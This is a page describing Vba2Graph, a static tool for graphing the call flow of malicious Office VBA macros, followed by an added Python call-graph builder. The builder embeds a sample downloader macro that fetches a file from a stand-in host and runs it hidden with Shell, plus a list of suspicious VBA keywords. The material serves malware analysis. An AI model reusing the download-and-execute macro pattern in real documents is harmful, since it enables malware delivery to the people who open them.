Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A tool for security researchers who waste their time analyzing malicious Office macros. It generates a VBA call graph with potentially malicious keywords highlighted, allowing quick analysis of malicious macros and an easy understanding of the execution flow.

By @MalwareCantFly

Features

- Keyword highlighting
- VBA Properties support
- External function declaration support
- Tricky macros with "_Change" execution triggers
- Fancy color schemes!

Pros

- Pretty fast
- Works well on most malicious macros observed in the wild

Cons

- Static (dynamically resolved calls would not be recognized)

Examples

Example 1: Trickbot downloader, which utilizes an object Resize event as the initial trigger, followed by TextBox_Change triggers.

Example 2: (graph image omitted here)

Check out the Examples folder for more cases.

Installation

1. Install oletools: https://github.com/decalage2/oletools/wiki/Install

2. Install the Python requirements:

       pip2 install -r requirements.txt

3. Install Graphviz

   Windows: install the Graphviz msi from https://graphviz.gitlab.io/_pages/Download/Download_windows.html and add "dot.exe" to the PATH environment variable, or just:

       set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

   Mac:

       brew install graphviz

   Ubuntu:

       sudo apt-get install graphviz

   Arch:

       sudo pacman -S graphviz

Usage

    usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

    optional arguments:
      -h, --help            show this help message and exit
      -o OUTPUT, --output OUTPUT
                            output folder (default: "output")
      -c {0,1,2,3}, --colors {0,1,2,3}
                            color scheme number [0, 1, 2, 3] (default: 0 - B&W)
      -i INPUT, --input INPUT
                            olevba generated file or .bas file
      -f FILE, --file FILE  Office file with macros

Usage Examples (All Platforms)

Only Python 2 is supported:

    # Generate call graph directly from an Office file with macros [tnx @doomedraven]
    python2 vba2graph.py -f malicious.doc -c 2

    # Generate VBA code using olevba, then pipe it to vba2graph
    olevba malicious.doc | python2 vba2graph.py -c 1

    # Generate call graph from VBA code
    python2 vba2graph.py -i vba_code.bas -o output_folder

Both olevba and vba2graph only parse the document; the macros are never executed. That is also why calls resolved at run time (see Cons) do not appear in the graph.

Output

You'll get 4 folders in your output folder:

- png: the actual graph image you are looking for
- svg: the same graph image, just in vector graphics
- dot: the dot file which was used to create the graph image
- bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux: the batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs. It deletes the output dir; use with caution.

Download Vba2Graph
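To make concrete what the Features list above means in practice (procedure and Declare parsing, "_Change" trigger edges, keyword highlighting, DOT output), here is a small static call-graph builder in Python. It is an added example written for this page and is not vba2graph's own code; the sample macro, the suspicious-keyword list, the trigger heuristic (an assignment to a control's Text/Value/Caption is assumed to fire that control's _Change handler) and the script name are all my constructions. Like the tool, it is purely static: anything resolved at run time (CallByName, late-bound objects) is only flagged as a keyword, never followed as an edge.

```python
"""Minimal static VBA call-graph builder in the spirit of vba2graph (added example).
Reads a .bas file or olevba text output and prints Graphviz DOT."""
import re
import sys
from collections import OrderedDict

# Constructed sample mirroring the Trickbot pattern described on the page:
# a Resize event writes into a TextBox, that write fires TextBox1_Change,
# which downloads and runs a payload.  URL, names and paths are made up.
SAMPLE_VBA = r'''
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub UserForm_Resize()
    TextBox1.Text = "go"          ' this assignment fires TextBox1_Change
End Sub

Private Sub TextBox1_Change()
    Fetch
End Sub

Private Sub Fetch()
    Dim r As Long
    r = URLDownloadToFile(0, "http://example.invalid/x.exe", Environ("TEMP") & "\x.exe", 0, 0)
    Launch
End Sub

Private Sub Launch()
    Shell Environ("TEMP") & "\x.exe", vbHide   ' a name in a comment or string, e.g. "Fetch", is not a call
End Sub

Public Property Get Payload() As String
    Payload = "x"
End Property
'''

HEADER = re.compile(r'^\s*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?'
                    r'(Sub|Function|Property\s+(?:Get|Let|Set))\s+(\w+)', re.I)
DECLARE = re.compile(r'^\s*(?:(?:Public|Private)\s+)?Declare\s+(?:PtrSafe\s+)?'
                     r'(?:Sub|Function)\s+(\w+)\s+Lib\s+"([^"]+)"', re.I)
END = re.compile(r'^\s*End\s+(?:Sub|Function|Property)\b', re.I)
STRING = re.compile(r'"(?:[^"]|"")*"')
COMMENT = re.compile(r"'.*$")
# Assumed trigger heuristic: writing X.Text/X.Value/X.Caption (or X) fires X_Change.
ASSIGN = re.compile(r'^\s*(\w+)(?:\.(?:Text|Value|Caption))?\s*=', re.I)
IDENT = re.compile(r"[A-Za-z_]\w*")
# My own keyword list, not the tool's; extend to taste.
SUSPICIOUS = ("Shell", "CreateObject", "GetObject", "URLDownloadToFile", "Environ",
              "Kill", "CallByName", "ShellExecute", "Chr", "StrReverse", "Execute")


def strip_noise(line):
    """Remove string literals and trailing comments so their contents are never scanned."""
    return COMMENT.sub("", STRING.sub("", line))


def build_graph(vba):
    """Return (procs, externals, edges): procs maps name -> {'kind','lines','keywords'},
    externals maps a Declare'd name -> library, edges is a list of (caller, callee, kind)."""
    procs, externals, current = OrderedDict(), OrderedDict(), None
    for raw in vba.splitlines():
        d = DECLARE.match(raw)              # needs the raw line: the Lib name is a string
        if d:
            externals[d.group(1)] = d.group(2)
            continue
        line = strip_noise(raw)
        if END.match(line):
            current = None
            continue
        h = HEADER.match(line)
        if h:
            current = h.group(2)
            procs[current] = {"kind": h.group(1).title(), "lines": [], "keywords": []}
        elif current:
            procs[current]["lines"].append(line)

    lower = {n.lower(): n for n in list(procs) + list(externals)}   # VBA is case-insensitive
    edges = []
    for caller, info in procs.items():
        for line in info["lines"]:
            for ident in IDENT.findall(line):
                target = lower.get(ident.lower())
                if target and target != caller and (caller, target, "call") not in edges:
                    edges.append((caller, target, "call"))
            a = ASSIGN.match(line)
            handler = lower.get(a.group(1).lower() + "_change") if a else None
            if handler and (caller, handler, "trigger") not in edges:
                edges.append((caller, handler, "trigger"))
        body = "\n".join(info["lines"])
        info["keywords"] = [k for k in SUSPICIOUS if re.search(r"\b%s\b" % k, body, re.I)]
    return procs, externals, edges


def entry_points(procs, edges):
    """Procedures nobody calls or triggers: where execution must start (events, Auto* subs)."""
    called = {dst for _, dst, _ in edges}
    return [n for n in procs if n not in called]


def to_dot(procs, externals, edges):
    """Render the graph as DOT; keyword hits colour the node, triggers are dotted edges."""
    out = ["digraph vba {", "  rankdir=LR;",
           '  node [shape=box, style="rounded,filled", fillcolor=white];']
    for name, info in procs.items():
        label = name + ("\\n(%s)" % info["kind"] if info["kind"].startswith("Property") else "")
        if info["keywords"]:
            label += "\\n" + ", ".join(info["keywords"])
        out.append('  "%s" [label="%s", fillcolor=%s];'
                   % (name, label, "orange" if info["keywords"] else "white"))
    for name, lib in externals.items():
        out.append('  "%s" [label="%s\\n(%s)", style="dashed"];' % (name, name, lib))
    for src, dst, kind in edges:
        attr = ' [style=dotted, label="_Change trigger"]' if kind == "trigger" else ""
        out.append('  "%s" -> "%s"%s;' % (src, dst, attr))
    out.append("}")
    return "\n".join(out)


if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_VBA
    p, x, e = build_graph(source)
    print(to_dot(p, x, e))
```

Run it as `python3 vba_callgraph.py macro.bas | dot -Tpng -o graph.png` (hypothetical script name; `dot` is the Graphviz binary installed above), or feed it olevba's output via `/dev/stdin`. On the sample, the only entry points are UserForm_Resize and the never-called Payload property, and the chain Resize -> TextBox1_Change -> Fetch -> Launch is visible with Fetch and Launch highlighted.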

Link: http://feedproxy.google.com/~r/PentestTools/~3/nFNb7qSmnXo/vba2graph-generate-call-graphs-from-vba.html